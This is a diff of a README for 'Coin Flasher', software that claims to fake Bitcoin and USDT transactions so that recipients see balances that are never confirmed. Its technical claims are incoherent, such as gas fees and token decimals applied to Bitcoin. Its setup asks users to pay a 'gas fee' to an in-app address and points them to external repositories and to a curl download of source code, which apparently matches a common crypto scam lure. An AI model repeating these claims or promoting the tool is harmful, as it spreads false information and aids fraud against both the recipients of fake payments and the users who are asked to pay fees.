bitcoin-flashing-ai/alpha-release/README.md

 ### What is Bitcoin flashing?

-Bitcoin flashing is a technique that creates the illusion of a successful Bitcoin transaction, manipulate the receiver's local display to show a fake balance.
-It is an unconfirmed transaction that will eventually be rejected by the blockchain.
-This is achieved either by manipulating the transaction signature and the gas fee programatically.
+Bitcoin flashing is a practice of sending Bitcoin from one wallet to another in a transaction that will be rendered invalid in the long run.
+This is achieved either by manipulating the transaction signature, gas fees, or altering the token decimals programatically.

-### First AI Powered Bitcoin flashing software public release
+### Bitcoin flashing software

-Coin Flashr is an AI powered software application that lets users perform bitcoin flashing with multiple variants of Bitcoin (including Bitcoin Fantom and Wrapped Bitcoin) and USDT (ERC20, BEP20, and TRC20) on all devices.
-We developed this software mainly as a proof-of-concept, and only for demonstration purposes.
+Coin Flasher is a Bitcoin flashing software that lets users perform BTC and USDT flashing transactions with multiple variants of Bitcoin (including Bitcoin Fantom and Wrapped Bitcoin) and USDT (ERC20, SOL, BEP20, and TRC20).
+This software application exists solely as a proof of concept solution, and should only be used experimentally.
 The setup and utilization is entirely dummyproof.
-Flash tokens have a limited usage range, and they can not be swapped simply due to a lack of liquidity.
-The practical use case is transfers between cold and hardware wallets.
-The bitcoin can be sent to an exchange platform, but confirmation will never happen.
-Flash tokens are identical to the real deal until the user studies the underlying code or attempt to swap them.
+Flash tokens have a limited usage range, and they can not be swapped simply due to a lack of liquidity, ergo you can not sell them on cryptocurrency exchanges.
+That simply does not exist.
+What you can do, however, is transfer them between cold and hardware wallets.
+Flash tokens are identical to the real thing until you study the underlying code.

-The user will have a limited spendable quota of either Bitcoin or USDT, and is responsible for the gas fee for the flashing transactions.
-The user will find a gas address in-app and the gas topup process is simple.
+When you gain app access, you'll have a limited spendable quota of either bitcoin or USDT, but you'll be responsible for your gas fee for the flashing transactions.
+You'll find a gas address in-app and the gas topup process is simple.

-### Bitcoin flashing mobile app (Android/IOS)

-Click [here](https://github.com/bitcoin-flashing-mobile-ai/public-release) to flash Bitcoin from your mobile phone.

-### Bitcoin flashing source code

-Bitcoin flashing source code is available for instant download as a zip file through curl on the terminal.
-Details available in-app.

 ## Prerequisites
 This application requires [Node.js](https://nodejs.org) to run.

+### Android/IOS

+Click [here](https://github.com/bitcoin-usdt-flashing-software/flash-BTC-apk) to visit the mobile repository.

 ### Windows